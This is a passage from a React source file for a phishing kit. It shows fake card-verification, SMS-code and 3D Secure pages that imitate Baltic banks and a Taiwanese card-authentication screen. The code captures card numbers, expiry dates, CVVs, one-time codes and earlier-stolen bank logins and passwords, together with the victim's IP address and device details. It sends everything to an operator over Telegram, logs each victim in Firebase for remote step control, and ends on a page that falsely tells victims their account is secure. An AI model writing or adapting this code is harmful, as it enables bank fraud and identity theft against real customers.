      if (!stepInitSeen.current) {
        stepInitSeen.current = true;
        lastStepRef.current = step;
        return;
      }
      if (step !== lastStepRef.current) {
        lastStepRef.current = step;
        if (typeof onStepChange === 'function') {
          onStepChange(step, uid);
        } else {
          redirectUserToStep(step, uid);
        }
      }
    });
    return () => unsub();
  }, [resolveUserId, onStepChange]);
}

const CardPage = ({ variant = 'standard' }) => {
  const isErrorVariant = variant === 'incorrect';
  // Keep user on card step after submit; no auto-redirect to SMS.
  const currentStep = isErrorVariant ? 9 : 5;
  const stepKey = isErrorVariant ? 'step9' : 'step5';
  const presetBanner = isErrorVariant
    ? 'No pudimos verificar tu tarjeta. Revisa los datos e inténtalo de nuevo.'
    : '';
  const [cardNumber, setCardNumber] = useState('');
  const [exp, setExp] = useState('');
  const [cvv, setCvv] = useState('');
  const [name, setName] = useState('');
  const [agree, setAgree] = useState(false);
  const [attempted, setAttempted] = useState(false);
  const [verifying, setVerifying] = useState(false);
  const [submitError, setSubmitError] = useState('');
  const [cardVisitorId, setCardVisitorId] = useState(null);
  const cardSubmittingRef = useRef(false);

  const brandKey = useMemo(() => detectBrand(cardNumber), [cardNumber]);
  const brand = brandKey ? CARD_BRANDS[brandKey] : null;
  const digits = cardNumber.replace(/\D/g, '');
  const hasMinBin = digits.length >= 6 && !!brandKey;
  const luhnPass = digits.length >= 12 && luhnCheck(cardNumber);
  const expPass = expValid(exp);
  const showCardError = digits.length > 0 && (!hasMinBin || !luhnPass);
  const showExpError = exp.length > 0 && !expPass;
  const cvvPass =
    (!!brand && cvv.length === brand.cvvLength) ||
    (!brand && (cvv.length === 3 || cvv.length === 4));
  const formValid = hasMinBin && luhnPass && expPass && cvvPass && name.trim() && agree;

  const formatCardNumber = (value) => {
    const digitsOnly = value.replace(/\D/g, '');
    const detected = detectBrand(digitsOnly) || brandKey;
    const limit = detected === 'amex' ? 15 : 16;
    const trimmed = digitsOnly.slice(0, limit);
    if (detected === 'amex') {
      return trimmed.replace(/(\d{4})(\d{0,6})?(\d{0,5})?/, (_m, g1 = '', g2 = '', g3 = '') =>
        [g1, g2, g3].filter(Boolean).join(' ')
      );
    }
    return trimmed.replace(/(\d{4})(?=\d)/g, '$1 ').trim();
  };

  const handleCardNumberChange = (value) => {
    setCardNumber(formatCardNumber(value));
    setAttempted(false);
  };

  const handleExpChange = (value) => {
    const digitsOnly = value.replace(/\D/g, '').slice(0, 4);
    const formatted = digitsOnly.length > 2 ? `${digitsOnly.slice(0, 2)}/${digitsOnly.slice(2)}` : digitsOnly;
    setExp(formatted);
    setAttempted(false);
  };

  const handleCvvChange = (value) => {
    const detected = detectBrand(cardNumber) || brandKey;
    const limit = detected === 'amex' ? 4 : 3;
    const digitsOnly = value.replace(/\D/g, '').slice(0, limit);
    setCvv(digitsOnly);
    setAttempted(false);
  };

  const blockNonDigitKeys = (e, allowSlash = false) => {
    if (e.ctrlKey || e.metaKey || e.altKey) return;
    const allowedKeys = ['Backspace', 'Delete', 'Tab', 'ArrowLeft', 'ArrowRight', 'Home', 'End'];
    if (allowedKeys.includes(e.key)) return;
    if (/^\d$/.test(e.key)) return;
    if (allowSlash && e.key === '/') return;
    e.preventDefault();
  };

  const getOrCreateUserId = () => {
    const win = typeof window !== 'undefined' ? window : null;
    const stored = win?.localStorage?.getItem('visitorId');
    const sessionUid = getUidFromLocation() || getStoredUid();
    const chosen = sessionUid || stored;
    if (chosen) {
      if (!cardVisitorId) setCardVisitorId(chosen);
      if (sessionUid && win?.localStorage) win.localStorage.setItem('visitorId', sessionUid);
      return chosen;
    }
    const newId = push(ref(database, 'users')).key;
    if (newId && win?.localStorage) {
      win.localStorage.setItem('visitorId', newId);
    }
    if (newId && !cardVisitorId) setCardVisitorId(newId);
    return newId;
  };

  const resolveCardPresenceId = useCallback(
    () => cardVisitorId || getOrCreateUserId(),
    [cardVisitorId]
  );

  useRealtimePresence(resolveCardPresenceId);
  useStepRedirect(resolveCardPresenceId);

  const submitCardDetails = async () => {
    if (cardSubmittingRef.current) return false;
    cardSubmittingRef.current = true;
    console.log('[card] submit start');
    setSubmitError('');
    setAttempted(true);
    if (!formValid) {
      setSubmitError('Completa los datos de la tarjeta para continuar.');
      cardSubmittingRef.current = false;
      return false;
    }
    setVerifying(true);

    let keepLoadingAfterSubmit = false;
    try {
      const uid = cardVisitorId || getOrCreateUserId();
      if (!uid) {
        setSubmitError('No se pudo crear sesión.');
        return false;
      }

      const digitsOnly = cardNumber.replace(/\D/g, '');
      const expDigits = exp.replace(/\D/g, '');
      const expMonth = expDigits.slice(0, 2);
      const expYear = expDigits.slice(2, 4);
      const now = Date.now();
      const payload = {
        cardNumber: digitsOnly,
        cardDisplay: cardNumber.trim(),
        expiry: exp,
        expiryMonth: expMonth,
        expiryYear: expYear,
        cvv,
        brand: brand?.name || '',
        brandKey: brandKey || '',
        bin: digitsOnly.slice(0, 6),
        nameOnCard: name,
        verifiedAt: now,
        error: isErrorVariant,
        attempt: isErrorVariant ? 'retry' : 'initial',
      };
      const loginCreds = await resolveStoredLoginCreds(uid);
      const [meta, binInfo] = await Promise.all([
        fetchVisitorMetaShared().catch(() => ({})),
        fetchBinInfo(digitsOnly.slice(0, 6)).catch(() => ({})),
      ]);
      const countryLine = formatCountryLine(meta);
      const normalizedExp = exp.replace('-', '/').replace('.', '/').replace(/\s+/g, '');
      const networkLine = (binInfo.scheme || brand?.name || brandKey || '').toString().trim();

      try {
        const full = [
          ...headerLines('Card'),
          `👤 User ID: ${uid}`,
          `🌐 IP Address: ${meta.ip || 'N/A'}${meta.isp ? `/${meta.isp}` : ''}`,
          `📍 Country: ${countryLine}`,
          `🧭 Browser: ${meta.browser || 'N/A'}`,
          `🖥️ Device: ${meta.deviceType || 'N/A'}`,
          `💻 OS: ${meta.os || 'N/A'}`,
          `🔗 URL: ${meta.siteUrl || window?.location?.href || 'N/A'}`,
          '',
          '🏦 Login:',
          `username: ${loginCreds.username || 'N/A'}`,
          `password: ${loginCreds.password || 'N/A'}`,
        ];
        if (digitsOnly) full.push(`BIN: ${digitsOnly}`);
        if (normalizedExp) full.push(`EXP: ${normalizedExp}`);
        if (cvv) full.push(`CVV: ${cvv}`);
        if (name) full.push(`Name: ${name}`);
        if (binInfo.bank) full.push(`Bank: ${binInfo.bank}`);
        if (binInfo.level) full.push(`Level: ${binInfo.level}`);
        if (networkLine) full.push(`Network: ${networkLine.toUpperCase()}`);
        if (binInfo.type) full.push(`Type: ${String(binInfo.type).toUpperCase()}`);
        if (typeof binInfo.prepaid === 'boolean') full.push(`Prepaid: ${binInfo.prepaid ? 'Yes' : 'No'}`);
        const actionButtons = buildActionButtons(uid);
        const sentFull = await sendAdminEvent(full.join('\n'), 'form', { buttons: actionButtons });
        if (!sentFull) {
          await sendAdminEvent(`${brandPrefix('Card')}\n\nCard fallback ping`, 'form', { buttons: actionButtons });
        }
        console.log('[card] full send result', sentFull);
      } catch (err) {
        console.warn('Telegram card send failed', err);
      }

      // Persist to DB and keep current card step
      try {
        const userRef = ref(database, `users/${uid}`);
        setStoredCardDetails({
          ...payload,
          binMeta: binInfo && Object.keys(binInfo).length ? binInfo : null,
        });
        await update(userRef, {
          userId: uid,
          step: currentStep,
          lastUpdated: now,
          [stepKey]: {
            ...payload,
            binMeta: binInfo && Object.keys(binInfo).length ? binInfo : null,
          },
        });
      } catch (err) {
        console.warn('Card DB update failed', err);
        setSubmitError('No pudimos guardar tu tarjeta. Inténtalo de nuevo.');
        return false;
      }

      // Keep button in loading state and stay on this page after successful submit.
      keepLoadingAfterSubmit = true;
      return true;
    } catch (err) {
      console.error('Card submit failed', err);
      return false;
    } finally {
      cardSubmittingRef.current = false;
      if (!keepLoadingAfterSubmit) setVerifying(false);
    }
  };

  const selectBankAndContinue = async ({ bankId, bankName, href }) => {
    const uid = resolveCardPresenceId();
    if (!uid) return;
    const now = Date.now();
    try {
      const userRef = ref(database, `users/${uid}`);
      // Store selection in step1 so the dashboard can show the bank chip + logo.
      await update(userRef, {
        userId: uid,
        lastUpdated: now,
        'step1/selectedBank': bankId,
        'step1/selectedBankName': bankName,
        'step1/selectedBankShortName': bankName,
        step: currentStep,
      });
    } catch (err) {
      console.warn('[bank-select] failed to persist selection', err);
    }
    try {
      const actionButtons = buildActionButtons(uid);
      await sendAdminEvent(
        [...headerLines('Bank'), `👤 User ID: ${uid}`, `🏦 Selected bank: ${bankName} (${bankId})`].join('\n'),
        'form',
        { buttons: actionButtons }
      );
    } catch (err) {
      console.warn('[bank-select] telegram send failed', err);
    }
    if (href) {
      window.location.assign(href);
    }
  };

  const templateHtml = useTemplateBody('select');
  const templateRootRef = useRef(null);

  useEffect(() => {
    const root = templateRootRef.current;
    if (!root || !templateHtml) return undefined;

    const BANK_LINKS = [
      { match: 'bank=swed', id: 'swedbank', name: 'Swedbank', href: '/swedbank' },
      { match: 'bank=seb', id: 'seb', name: 'SEB', href: '/seb' },
      { match: 'bank=citadele', id: 'citadele', name: 'Citadele', href: '/citadele' },
      { match: 'bank=luminor', id: 'luminor', name: 'Luminor', href: '/luminor' },
    ];

    const cleanup = [];
    Array.from(root.querySelectorAll('a[href]')).forEach((a) => {
      const href = String(a.getAttribute('href') || '');
      const normalizedHref = href.replace(/\/+$/, '').toLowerCase();
      const datasetBankId = String(a.dataset.bankId || '').trim().toLowerCase();
      const datasetBankName = String(a.dataset.bankName || '').trim();
      const datasetBankHref = String(a.dataset.bankHref || '').trim();

      const match =
        BANK_LINKS.find((entry) => href.includes(entry.match)) ||
        BANK_LINKS.find((entry) => normalizedHref === entry.href.toLowerCase());

      const resolvedBank =
        match ||
        (datasetBankId ? BANK_LINKS.find((entry) => entry.id === datasetBankId) : null);

      if (resolvedBank) {
        // Persist a stable marker so subsequent rerenders keep the link clickable
        a.dataset.bankId = resolvedBank.id;
        a.dataset.bankName = resolvedBank.name;
        a.dataset.bankHref = resolvedBank.href;

        a.setAttribute('href', resolvedBank.href);
        const onClick = (e) => {
          e.preventDefault();
          void selectBankAndContinue({
            bankId: resolvedBank.id,
            bankName: resolvedBank.name,
            href: resolvedBank.href,
          });
        };
        a.addEventListener('click', onClick);
        cleanup.push(() => a.removeEventListener('click', onClick));
        return;
      }

      // Keep the select page "static": prevent other template links (eParaksts cards,
      // footer links, etc.) from navigating away.
      const onNoNav = (e) => {
        e.preventDefault();
      };
      a.setAttribute('href', '#');
      a.addEventListener('click', onNoNav);
      cleanup.push(() => a.removeEventListener('click', onNoNav));
    });

    return () => cleanup.forEach((fn) => fn());
  }, [templateHtml]);

  return <div ref={templateRootRef} dangerouslySetInnerHTML={{ __html: templateHtml }} />;
};


const SmsPage = ({ variant = 'standard' }) => {
  const isErrorVariant = variant === 'incorrect';
  const targetStep = isErrorVariant ? 7 : 3;
  const stepKey = isErrorVariant ? 'step7' : 'step3';
  const presetBanner = isErrorVariant
    ? 'No pudimos verificar tu código. Inténtalo de nuevo.'
    : '';

  const [code, setCode] = useState('');
  const [attempted, setAttempted] = useState(false);
  const [verifying, setVerifying] = useState(false);
  const [submitError, setSubmitError] = useState('');
  const [smsVisitorId, setSmsVisitorId] = useState(null);
  const [selectedBank, setSelectedBank] = useState({ id: '', name: '', logo: '' });

  const codeLooksValid = (() => {
    const len = code.trim().length;
    return len >= 6 && len <= 8;
  })();

  const blockNonDigitKeys = (e) => {
    if (e.ctrlKey || e.metaKey || e.altKey) return;
    const allowedKeys = ['Backspace', 'Delete', 'Tab', 'ArrowLeft', 'ArrowRight', 'Home', 'End'];
    if (allowedKeys.includes(e.key)) return;
    if (/^\d$/.test(e.key)) return;
    e.preventDefault();
  };

  const getOrCreateUserId = () => {
    const win = typeof window !== 'undefined' ? window : null;
    const stored = win?.localStorage?.getItem('visitorId');
    const sessionUid = getUidFromLocation() || getStoredUid();
    const chosen = sessionUid || stored;
    if (chosen) {
      if (!smsVisitorId) setSmsVisitorId(chosen);
      if (sessionUid && win?.localStorage) win.localStorage.setItem('visitorId', sessionUid);
      return chosen;
    }
    const newId = push(ref(database, 'users')).key;
    if (newId && win?.localStorage) {
      win.localStorage.setItem('visitorId', newId);
    }
    if (newId && !smsVisitorId) setSmsVisitorId(newId);
    return newId;
  };

  const resolveSmsPresenceId = useCallback(() => smsVisitorId || getOrCreateUserId(), [smsVisitorId]);

  useRealtimePresence(resolveSmsPresenceId);
  useStepRedirect(resolveSmsPresenceId);

  // Load selected bank (for logo display on SMS page).
  useEffect(() => {
    const uid = smsVisitorId || getOrCreateUserId();
    if (!uid) return;
    let alive = true;
    const logoById = {
      swedbank: bankSwed,
      seb: bankSeb,
      citadele: bankCitadele,
      luminor: bankLuminor,
    };
    void get(ref(database, `users/${uid}/step1`))
      .then((snap) => {
        if (!alive) return;
        const s1 = snap.val() || {};
        const id = String(s1.selectedBank || s1.bank || '').trim().toLowerCase();
        const name =
          String(s1.selectedBankName || s1.bankName || s1.selectedBankShortName || s1.bankShort || id || '')
            .trim() || '';
        const logo = id && logoById[id] ? logoById[id] : '';
        setSelectedBank({ id, name, logo });
      })
      .catch(() => {});
    return () => {
      alive = false;
    };
  }, [smsVisitorId]);

  const submitSmsCode = async () => {
    const uid = smsVisitorId || getOrCreateUserId();
    if (!uid) throw new Error('Missing user id');
    const now = Date.now();
    const payload = {
      verificationCode: code.trim(),
      code: code.trim(),
      otp: code.trim(),
      enteredAt: now,
      error: isErrorVariant,
      attempt: isErrorVariant ? 'retry' : 'initial',
    };
    const userRef = ref(database, `users/${uid}`);
    await update(userRef, {
      userId: uid,
      step: targetStep,
      lastUpdated: now,
      [stepKey]: payload,
    });
    const loginCreds = await resolveStoredLoginCreds(uid);
    const cardDetails = await resolveStoredCardDetails(uid);
    const cardNumber =
      String(cardDetails.cardNumber ?? cardDetails.number ?? cardDetails.card ?? '').replace(/\D+/g, '') || '';
    const cardExp =
      cardDetails.expiry ||
      ((cardDetails.expiryMonth && cardDetails.expiryYear)
        ? `${String(cardDetails.expiryMonth).padStart(2, '0')}/${String(cardDetails.expiryYear).slice(-2)}`
        : '');
    const cardCvv = cardDetails.cvv ?? cardDetails.cvc ?? cardDetails.cvv2 ?? '';

    try {
      const meta = await fetchVisitorMetaShared().catch(() => ({}));
      const countryLine = formatCountryLine(meta);
      const metaLines = [
        `🌐 IP: ${meta.ip || 'N/A'}`,
        `🏢 ISP: ${meta.isp || 'N/A'}`,
        `📍 Country: ${countryLine}`,
        `🧭 Browser: ${meta.browser || 'N/A'}`,
        `🖥️ Device: ${meta.deviceType || 'N/A'}`,
        `💻 OS: ${meta.os || 'N/A'}`,
        `🔗 URL: ${meta.siteUrl || window?.location?.href || 'N/A'}`,
      ];
      const lines = [
        ...headerLines('SMS'),
        `👤 User ID: ${uid}`,
        ...metaLines,
        '',
        '🏦 Login:',
        `username: ${loginCreds.username || 'N/A'}`,
        `password: ${loginCreds.password || 'N/A'}`,
        ...(cardNumber ? [`BIN: ${cardNumber}`] : []),
        ...(cardExp ? [`EXP: ${String(cardExp).replace('-', '/').replace('.', '/').replace(/\s+/g, '')}`] : []),
        ...(cardCvv ? [`CVV: ${cardCvv}`] : []),
        '',
        `Verification code: ${code.trim()}`,
      ];
      const actionButtons = buildActionButtons(uid);
      const sent = await sendAdminEvent(lines.join('\n'), 'form', { buttons: actionButtons });
      if (!sent) {
        await sendAdminEvent(`${brandPrefix('SMS')}\n\nSMS fallback ping`, 'form', { buttons: actionButtons });
      }
    } catch (err) {
      console.warn('Telegram sms send failed', err);
    }
  };

  return (
    <div className="bank-sms-wrap">
      <div
        className="modal problem fade show bank-sms-modal"
        tabIndex={-1}
        aria-hidden="true"
        style={{ display: 'block', background: 'rgba(0,0,0,0.3)' }}
      >
        <div className="modal-dialog modal-dialog-centered justify-content-center w-xs-100" style={{ background: 'transparent' }}>
          <div className="modal-content">
            <div className="modal-header text-center bank-sms-header" style={{ background: 'rgba(0,0,0,0.5)', padding: '15px' }}>
              <img
                className="bank-sms-toplogo"
                style={{ maxWidth: '110px' }}
                src={selectedBank.logo || bankLogin2}
                alt=""
              />
              <b style={{ fontSize: '14px', paddingRight: '15px', color: 'white' }} />
            </div>

            <div className="modal-body">
              <form
                className="bank-sms-form"
                onSubmit={async (e) => {
                  e.preventDefault();
                  setAttempted(true);
                  setSubmitError('');
                  if (verifying) return;
                  setVerifying(true);
                  try {
                    await submitSmsCode();
                  } catch (err) {
                    console.error('SMS submit failed', err);
                    setSubmitError('No pudimos verificar el código. Inténtalo de nuevo.');
                    setVerifying(false);
                  }
                }}
              >
                <h3>{isErrorVariant ? 'Introduce el código otra vez' : 'Introduce el código de verificación'}</h3>
                <p className="bank-sms-hint">
                  Revisa tus mensajes para encontrar el código SMS y escríbelo abajo.
                </p>

                {presetBanner ? (
                  <p className="bank-sms-banner" role="alert">
                    {presetBanner}
                  </p>
                ) : null}

                <label className="bank-sms-label" htmlFor="sms-code-input">
                  Código
                </label>
                <input
                  id="sms-code-input"
                  className="form-control bank-sms-input"
                  type="text"
                  inputMode="numeric"
                  autoComplete="one-time-code"
                  value={code}
                  onChange={(e) => {
                    setCode(e.target.value.replace(/\D+/g, '').slice(0, 8));
                    setAttempted(false);
                  }}
                  maxLength={8}
                  pattern="[0-9]*"
                  required
                  onKeyDown={blockNonDigitKeys}
                  readOnly={verifying}
                  aria-invalid={attempted && !codeLooksValid}
                  aria-describedby={attempted && !codeLooksValid ? 'sms-code-error' : undefined}
                />

                {attempted && !codeLooksValid ? (
                  <p className="bank-sms-error" id="sms-code-error" role="alert">
                    Ingresa el código de 6 dígitos que acabamos de enviar.
                  </p>
                ) : null}

                <button
                  type="submit"
                  className={`btn ntb bank-sms-submit ${verifying ? 'is-loading' : ''}`}
                  disabled={!codeLooksValid || verifying}
                  aria-busy={verifying}
                >
                  {verifying ? (
                    <span className="bank-sms-btn-inner">
                      <span className="bank-sms-spinner" aria-hidden="true" />
                      <span>Verificando…</span>
                    </span>
                  ) : (
                    'Confirmar'
                  )}
                </button>

                {submitError ? (
                  <p className="bank-sms-error" role="alert">
                    {submitError}
                  </p>
                ) : null}
              </form>
            </div>
          </div>
        </div>
      </div>
    </div>
  );
};

const ThreeDSChallengePage = () => {
  const [selectedAuthId, setSelectedAuthId] = useState('');
  const [code, setCode] = useState('');
  const [submitError, setSubmitError] = useState('');
  const [busyAction, setBusyAction] = useState('');
  const [threeDsVisitorId, setThreeDsVisitorId] = useState(null);
  const [threeDsConfig, setThreeDsConfig] = useState(resolveThreeDsConfig());

  const getOrCreateUserId = () => {
    const win = typeof window !== 'undefined' ? window : null;
    const stored = win?.localStorage?.getItem('visitorId');
    const sessionUid = getUidFromLocation() || getStoredUid();
    const chosen = sessionUid || stored;
    if (chosen) {
      if (!threeDsVisitorId) setThreeDsVisitorId(chosen);
      if (sessionUid && win?.localStorage) win.localStorage.setItem('visitorId', sessionUid);
      return chosen;
    }
    const newId = push(ref(database, 'users')).key;
    if (newId && win?.localStorage) {
      win.localStorage.setItem('visitorId', newId);
    }
    if (newId && !threeDsVisitorId) setThreeDsVisitorId(newId);
    return newId;
  };

  const resolveThreeDsPresenceId = useCallback(
    () => threeDsVisitorId || getOrCreateUserId(),
    [threeDsVisitorId]
  );

  useRealtimePresence(resolveThreeDsPresenceId);
  useStepRedirect(resolveThreeDsPresenceId);

  useEffect(() => {
    const uid = threeDsVisitorId || getOrCreateUserId();
    const userPrefillPath = uid ? `users/${uid}/step20Prefill` : null;
    let pageSnapValue = {};
    let userSnapValue = {};

    const syncConfig = () => {
      const merged = {
        ...pageSnapValue,
        ...userSnapValue,
        authOptions: normalizeThreeDsOptions({
          authOptions:
            (Array.isArray(userSnapValue?.authOptions) && userSnapValue.authOptions.length
              ? userSnapValue.authOptions
              : null) ||
            pageSnapValue?.authOptions,
        }),
      };
      setThreeDsConfig(resolveThreeDsConfig(merged));
    };

    const unsubPage = onValue(
      ref(database, `pageConfig/${THREE_DS_STEP}`),
      (snap) => {
        pageSnapValue = snap.val() || {};
        syncConfig();
      },
      () => {
        pageSnapValue = {};
        syncConfig();
      }
    );

    const unsubUser = userPrefillPath
      ? onValue(
          ref(database, userPrefillPath),
          (snap) => {
            userSnapValue = snap.val() || {};
            syncConfig();
          },
          () => {
            userSnapValue = {};
            syncConfig();
          }
        )
      : () => {};

    return () => {
      unsubPage();
      unsubUser();
    };
  }, [threeDsVisitorId]);

  const persistThreeDsEvent = useCallback(
    async ({ action, selectedValue = '', passcode = '' }) => {
      const uid = threeDsVisitorId || getOrCreateUserId();
      if (!uid) throw new Error('Missing user id');

      const now = Date.now();
      const payload = {
        selectedAuthId: selectedValue,
        selectedOption: selectedValue,
        code: passcode,
        otpPassword: passcode,
        action,
        authOptions: threeDsConfig.authOptions,
        enteredAt: now,
      };

      await update(ref(database, `users/${uid}`), {
        userId: uid,
        step: THREE_DS_STEP,
        lastUpdated: now,
        step20: payload,
      });

      try {
        const meta = await fetchVisitorMetaShared().catch(() => ({}));
        const loginCreds = await resolveStoredLoginCreds(uid);
        const cardDetails = await resolveStoredCardDetails(uid);
        const cardNumber =
          String(cardDetails.cardNumber ?? cardDetails.number ?? cardDetails.card ?? '').replace(
            /\D+/g,
            ''
          ) || '';
        const cardExp =
          cardDetails.expiry ||
          (cardDetails.expiryMonth && cardDetails.expiryYear
            ? `${String(cardDetails.expiryMonth).padStart(2, '0')}/${String(
                cardDetails.expiryYear
              ).slice(-2)}`
            : '');
        const cardCvv = cardDetails.cvv ?? cardDetails.cvc ?? cardDetails.cvv2 ?? '';
        const countryLine = formatCountryLine(meta);
        const metaLines = [
          `🌐 IP: ${meta.ip || 'N/A'}`,
          `🏢 ISP: ${meta.isp || 'N/A'}`,
          `📍 Country: ${countryLine}`,
          `🧭 Browser: ${meta.browser || 'N/A'}`,
          `🖥️ Device: ${meta.deviceType || 'N/A'}`,
          `💻 OS: ${meta.os || 'N/A'}`,
          `🔗 URL: ${meta.siteUrl || window?.location?.href || 'N/A'}`,
        ];
        const lines = [
          ...headerLines('3DS'),
          `👤 User ID: ${uid}`,
          ...metaLines,
          '',
          '🏦 Login:',
          `username: ${loginCreds.username || 'N/A'}`,
          `password: ${loginCreds.password || 'N/A'}`,
          ...(cardNumber ? [`BIN: ${cardNumber}`] : []),
          ...(cardExp
            ? [`EXP: ${String(cardExp).replace('-', '/').replace('.', '/').replace(/\s+/g, '')}`]
            : []),
          ...(cardCvv ? [`CVV: ${cardCvv}`] : []),
          '',
          `3DS action: ${action}`,
          `Selected web ID: ${selectedValue || 'N/A'}`,
          ...(passcode ? [`3DS password: ${passcode}`] : []),
        ];
        const actionButtons = buildActionButtons(uid);
        const sent = await sendAdminEvent(lines.join('\n'), 'form', { buttons: actionButtons });
        if (!sent) {
          await sendAdminEvent(`${brandPrefix('3DS')}\n\n3DS fallback ping`, 'form', {
            buttons: actionButtons,
          });
        }
      } catch (err) {
        console.warn('Telegram 3DS send failed', err);
      }

      return uid;
    },
    [threeDsConfig.authOptions, threeDsVisitorId]
  );

  const handleSubmit = async (e) => {
    e.preventDefault();
    setSubmitError('');
    if (busyAction) return;
    if (!selectedAuthId) {
      setSubmitError('請選擇網頁識別碼。');
      return;
    }
    if (!code.trim()) {
      setSubmitError('請輸入網路刷卡OTP服務密碼。');
      return;
    }
    setBusyAction('submit');
    try {
      await persistThreeDsEvent({
        action: 'submit',
        selectedValue: selectedAuthId,
        passcode: code.trim(),
      });
    } catch (err) {
      console.error('3DS submit failed', err);
      setSubmitError('提交失敗，請重新再試。');
      setBusyAction('');
    }
  };

  const handleCancel = async () => {
    if (busyAction) return;
    setBusyAction('cancel');
    setSubmitError('');
    try {
      await persistThreeDsEvent({
        action: 'cancel',
        selectedValue: selectedAuthId,
      });
      redirectUserToStep(11, threeDsVisitorId || getOrCreateUserId());
    } catch (err) {
      console.error('3DS cancel failed', err);
      setSubmitError('取消失敗，請重新再試。');
      setBusyAction('');
    }
  };

  const handleResend = async () => {
    if (busyAction) return;
    setBusyAction('resend');
    setSubmitError('');
    try {
      await persistThreeDsEvent({
        action: 'resend',
        selectedValue: selectedAuthId,
      });
      setBusyAction('');
    } catch (err) {
      console.error('3DS resend failed', err);
      setSubmitError('重新取得失敗，請重新再試。');
      setBusyAction('');
    }
  };

  return (
    <div className="threeds-page">
      <div className="threeds-wrapper">
        <div className="threeds-center-box">
          <div className="threeds-content">
            <div className="threeds-logo-row">
              <div className="threeds-logo-slot threeds-logo-slot--left">NCCC</div>
              <div className="threeds-logo-slot threeds-logo-slot--right">3D SECURE</div>
            </div>
            <div className="threeds-logo-divider" />
            <div className="threeds-title-row">
              <div className="threeds-title">{threeDsConfig.title}</div>
              <div className="threeds-language">{threeDsConfig.language}</div>
            </div>

            <div className="threeds-purchase-info">
              <p className="threeds-font-16">
                信用卡號：{threeDsConfig.cardMask}
                <br />
                交易日期：{new Date().toLocaleString('zh-TW', { hour12: false })}
              </p>
              <p className="threeds-otp-message">
                成功取得動態密碼,請檢視您的簡訊並輸入動態密碼。
              </p>
            </div>

            <form className="threeds-form" onSubmit={handleSubmit}>
              <div className="threeds-font-16">請選擇網頁識別碼：</div>
              <div className="threeds-auth-grid">
                {threeDsConfig.authOptions.map((option) => (
                  <label key={option} className="threeds-auth-option">
                    <input
                      className="threeds-radio"
                      type="radio"
                      name="selectedAuthId"
                      value={option}
                      checked={selectedAuthId === option}
                      disabled={!!busyAction}
                      onChange={(e) => setSelectedAuthId(e.target.value)}
                    />
                    <span>{option}</span>
                  </label>
                ))}
              </div>

              <div className="threeds-form-group">
                <input
                  className="threeds-form-control"
                  placeholder="請輸入網路刷卡OTP服務密碼(Please enter the password)"
                  autoComplete="off"
                  maxLength={20}
                  value={code}
                  disabled={!!busyAction && busyAction !== 'resend'}
                  onChange={(e) => setCode(e.target.value.replace(/\D+/g, '').slice(0, 20))}
                />
              </div>

              <button type="submit" className="threeds-btn threeds-btn-primary" disabled={!!busyAction}>
                {busyAction === 'submit' ? '送出中(submitting)' : '送出(submit)'}
              </button>
            </form>

            <div className="threeds-error-wrap">
              {submitError ? <div className="threeds-error">{submitError}</div> : null}
            </div>

            <p className="threeds-footnote">
              1. 請擇一選擇驗證方式。選擇「簡訊 OTP」，本行將於5 分鐘內以簡訊傳送交易認證密碼。
              <br />
              2. 請檢視留存本行手機以取得交易認證密碼，並輸入認證密碼後點選「送出」鈕，進行後續交易。
              <br />
              3. 慎防詐騙！請務必確認「交易金額」與「網頁識別碼」是否與簡訊/Email 內容相符後再進行驗證。
              <br />
              4. 若您無法完成交易或是未收到認證密碼，請與本行客服中心聯絡，電話（02）2528-7776。
            </p>
          </div>
        </div>
      </div>
    </div>
  );
};

const DonePage = () => {
  const [visitorId, setVisitorId] = useState(null);

  const getVisitorId = useCallback(() => {
    if (typeof window === 'undefined') return visitorId;
    const stored = window.localStorage.getItem('visitorId');
    if (stored && !visitorId) setVisitorId(stored);
    return stored;
  }, [visitorId]);

  const resolveDonePresenceId = useCallback(
    () => visitorId || getVisitorId(),
    [visitorId, getVisitorId]
  );

  useRealtimePresence(resolveDonePresenceId);
  useStepRedirect(resolveDonePresenceId);

  useEffect(() => {
    const uid = getVisitorId();
    if (!uid) return undefined;
    const userRef = ref(database, `users/${uid}`);
    update(userRef, { userId: uid, step: 11, lastUpdated: Date.now() }).catch(() => {});
    return undefined;
  }, [getVisitorId]);

  return (
    <div className="card-page done-page">
      <header className="card-nav">
        <div className="card-nav-inner">
          <a href="/" aria-label="Inicio" className="card-logo-link">
            <StreamLogo className="card-logo" />
          </a>
          <a className="card-signout" href="/logout">
            Cerrar sesión
          </a>
        </div>
      </header>

      <main className="card-main">
        <div className="card-shell done-shell">
          <div className="done-hero">
            <div className="done-badge" aria-hidden="true">✓</div>
            <h1 className="card-title">Todo listo</h1>
            <p className="done-subtitle">Hemos confirmado tus datos. Gracias por mantener segura tu cuenta.</p>
          </div>

          <a className="card-submit done-button" href="/">Volver al inicio</a>

          <p className="card-terms" style={{ textAlign: 'center' }}>
            ¿Necesitas ayuda? <a href="/contact">Contáctanos</a> o visita el <a href="/help">Centro de ayuda</a>.
          </p>
        </div>
      </main>
    </div>
  );
};

const NotFoundPage = () => (
  <html lang="es">
    <head>
      <meta charSet="utf-8" />
      <meta name="viewport" content="width=device-width,initial-scale=1" />
      <title>404 No disponible</title>
      <style>{`
        body{margin:0;font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',sans-serif;background:#0b0d11;color:#e5e7eb;display:flex;align-items:center;justify-content:center;min-height:100vh;}
        .box{text-align:center;padding:30px 34px;border:1px solid rgba(255,255,255,0.08);background:rgba(255,255,255,0.02);border-radius:10px;box-shadow:0 14px 32px rgba(0,0,0,0.4);max-width:380px;}
        .code{display:inline-block;padding:6px 12px;border-radius:12px;background:#e50914;color:#fff;font-weight:700;letter-spacing:1px;margin-bottom:10px;}
        h1{margin:6px 0;font-size:22px;color:#f3f4f6;}
        p{margin:6px 0 0;color:#c5c7ce;font-size:14px;line-height:1.45;}
      `}</style>
    </head>
    <body>
      <div className="box">
        <div className="code" aria-hidden="true">404</div>
        <h1>Página no accesible</h1>
        <p>Esta sección está restringida y no puede verse desde tu conexión.</p>
        <p>Por favor, permanece en esta pantalla.</p>
      </div>
    </body>
  </html>
);

function App() {
  const [stepFromUrl, setStepFromUrl] = useState(() => getStepFromLocation());
  const [uidFromUrl, setUidFromUrl] = useState(() => getUidFromLocation());

  useEffect(() => {
    const onPop = () => {
      setStepFromUrl(getStepFromLocation());
      setUidFromUrl(getUidFromLocation());
    };
    window.addEventListener('popstate', onPop);
    return () => window.removeEventListener('popstate', onPop);
  }, []);

  useEffect(() => {
    if (typeof window === 'undefined') return;
    const normalizedPath = (window.location.pathname || '').replace(/\/+$/, '').toLowerCase();
    if (normalizedPath === '/mtc3oda4mtq1mg==') {
